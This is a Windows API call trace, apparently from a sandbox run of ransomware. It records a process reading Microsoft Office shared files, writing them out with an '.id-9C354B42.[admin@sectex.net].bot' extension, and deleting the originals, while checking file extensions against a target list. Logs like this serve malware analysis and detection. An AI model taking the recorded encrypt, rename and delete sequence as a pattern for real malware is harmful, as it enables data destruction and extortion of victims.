	[0050.761] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0050.775] SetEndOfFile (hFile=0x184) returned 1
	[0050.775] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0050.778] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.778] WriteFile (in: hFile=0x184, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.779] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.779] WriteFile (in: hFile=0x184, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.780] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.780] WriteFile (in: hFile=0x184, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.782] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0050.782] CloseHandle (hObject=0x184) returned 1
	[0050.783] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.783] lstrlenW (lpString=".doc") returned 4
	[0050.783] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString=".docx") returned 5
	[0050.783] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0050.783] lstrlenW (lpString=".pdf") returned 4
	[0050.783] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString=".xls") returned 4
	[0050.783] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString=".xlsx") returned 5
	[0050.783] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0050.783] lstrlenW (lpString=".ppt") returned 4
	[0050.783] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.783] lstrlenW (lpString=".zip") returned 4
	[0050.783] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString=".rar") returned 4
	[0050.783] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0050.783] lstrlenW (lpString=".bz2") returned 4
	[0050.783] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0050.783] lstrlenW (lpString=".7z") returned 3
	[0050.783] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString=".dbf") returned 4
	[0050.784] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString=".1cd") returned 4
	[0050.784] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString=".jpg") returned 4
	[0050.784] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString=".doc") returned 4
	[0050.784] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString=".docx") returned 5
	[0050.784] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0050.784] lstrlenW (lpString=".pdf") returned 4
	[0050.784] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString=".xls") returned 4
	[0050.784] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString=".xlsx") returned 5
	[0050.784] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0050.784] lstrlenW (lpString=".ppt") returned 4
	[0050.784] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.784] lstrlenW (lpString=".zip") returned 4
	[0050.784] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString=".rar") returned 4
	[0050.784] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0050.784] lstrlenW (lpString=".bz2") returned 4
	[0050.784] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0050.785] lstrlenW (lpString=".7z") returned 3
	[0050.785] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0050.785] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.785] lstrlenW (lpString=".dbf") returned 4
	[0050.785] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0050.785] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.785] lstrlenW (lpString=".1cd") returned 4
	[0050.785] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0050.785] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75
	[0050.785] lstrlenW (lpString=".jpg") returned 4
	[0050.785] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0050.785] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0050.785] lstrlenW (lpString="DWTRIG20.EXE") returned 12
	[0050.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.479] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=629664) returned 1
	[0051.479] CloseHandle (hObject=0x21c) returned 1
	[0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20
	[0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.480] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.480] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0051.480] GetLastError () returned 0x0
	[0051.480] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x99ba0, lpOverlapped=0x0) returned 1
	[0051.493] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x99bb0, lpOverlapped=0x0) returned 1
	[0051.506] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.506] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0051.506] SetEndOfFile (hFile=0x1d0) returned 1
	[0051.506] CloseHandle (hObject=0x1d0) returned 1
	[0051.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.506] SetEndOfFile (hFile=0x21c) returned 1
	[0051.511] CloseHandle (hObject=0x21c) returned 1
	[0051.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.512] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1
	[0051.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.514] lstrlenW (lpString=".doc") returned 4
	[0051.514] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0051.514] lstrlenW (lpString=".docx") returned 5
	[0051.514] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0051.514] lstrlenW (lpString=".pdf") returned 4
	[0051.514] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0051.514] lstrlenW (lpString=".xls") returned 4
	[0051.514] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0051.514] lstrlenW (lpString=".xlsx") returned 5
	[0051.514] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0051.514] lstrlenW (lpString=".ppt") returned 4
	[0051.514] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0051.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.514] lstrlenW (lpString=".zip") returned 4
	[0051.514] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString=".rar") returned 4
	[0051.515] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString=".bz2") returned 4
	[0051.515] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0051.515] lstrlenW (lpString=".7z") returned 3
	[0051.515] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString=".dbf") returned 4
	[0051.515] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString=".1cd") returned 4
	[0051.515] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString=".jpg") returned 4
	[0051.515] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString=".doc") returned 4
	[0051.515] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0051.515] lstrlenW (lpString=".docx") returned 5
	[0051.515] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0051.515] lstrlenW (lpString=".pdf") returned 4
	[0051.515] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString=".xls") returned 4
	[0051.515] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString=".xlsx") returned 5
	[0051.515] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0051.515] lstrlenW (lpString=".ppt") returned 4
	[0051.515] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.515] lstrlenW (lpString=".zip") returned 4
	[0051.515] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0051.515] lstrlenW (lpString=".rar") returned 4
	[0051.515] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0051.516] lstrlenW (lpString=".bz2") returned 4
	[0051.516] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0051.516] lstrlenW (lpString=".7z") returned 3
	[0051.516] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0051.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.516] lstrlenW (lpString=".dbf") returned 4
	[0051.516] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0051.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.516] lstrlenW (lpString=".1cd") returned 4
	[0051.516] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0051.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62
	[0051.516] lstrlenW (lpString=".jpg") returned 4
	[0051.516] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0051.516] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0051.516] lstrlenW (lpString="offfiltx.dll") returned 12
	[0051.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.754] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=1486736) returned 1
	[0051.754] CloseHandle (hObject=0x21c) returned 1
	[0051.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20
	[0051.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.755] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.755] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0051.755] GetLastError () returned 0x0
	[0051.755] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0051.774] WriteFile (in: hFile=0x1c0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0051.791] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x6afa0, lpOverlapped=0x0) returned 1
	[0051.943] WriteFile (in: hFile=0x1c0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x6afb0, lpOverlapped=0x0) returned 1
	[0051.953] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.954] WriteFile (in: hFile=0x1c0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0051.954] SetEndOfFile (hFile=0x1c0) returned 1
	[0051.954] CloseHandle (hObject=0x1c0) returned 1
	[0051.954] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.954] SetEndOfFile (hFile=0x21c) returned 1
	[0051.958] CloseHandle (hObject=0x21c) returned 1
	[0051.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.958] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1
	[0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".doc") returned 4
	[0051.959] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".docx") returned 5
	[0051.959] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1
	[0051.959] lstrlenW (lpString=".pdf") returned 4
	[0051.959] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".xls") returned 4
	[0051.959] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".xlsx") returned 5
	[0051.959] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1
	[0051.959] lstrlenW (lpString=".ppt") returned 4
	[0051.959] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".zip") returned 4
	[0051.959] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".rar") returned 4
	[0051.959] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".bz2") returned 4
	[0051.959] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.959] lstrlenW (lpString=".7z") returned 3
	[0051.959] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".dbf") returned 4
	[0051.959] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".1cd") returned 4
	[0051.959] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".jpg") returned 4
	[0051.959] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.959] lstrlenW (lpString=".doc") returned 4
	[0051.959] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.959] lstrlenW (lpString=".docx") returned 5
	[0051.960] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1
	[0051.960] lstrlenW (lpString=".pdf") returned 4
	[0051.960] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.960] lstrlenW (lpString=".xls") returned 4
	[0051.960] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.960] lstrlenW (lpString=".xlsx") returned 5
	[0051.960] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1
	[0051.960] lstrlenW (lpString=".ppt") returned 4
	[0051.960] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0051.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.960] lstrlenW (lpString=".zip") returned 4
	[0051.960] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.960] lstrlenW (lpString=".rar") returned 4
	[0051.960] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.960] lstrlenW (lpString=".bz2") returned 4
	[0051.960] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.960] lstrlenW (lpString=".7z") returned 3
	[0051.960] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.960] lstrlenW (lpString=".dbf") returned 4
	[0051.960] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.960] lstrlenW (lpString=".1cd") returned 4
	[0051.960] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67
	[0051.960] lstrlenW (lpString=".jpg") returned 4
	[0051.960] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.960] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0051.960] lstrlenW (lpString="CGMIMP32.CFG") returned 12
	[0051.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.961] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=6811) returned 1
	[0051.961] CloseHandle (hObject=0x21c) returned 1
	[0051.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20
	[0051.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0051.961] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
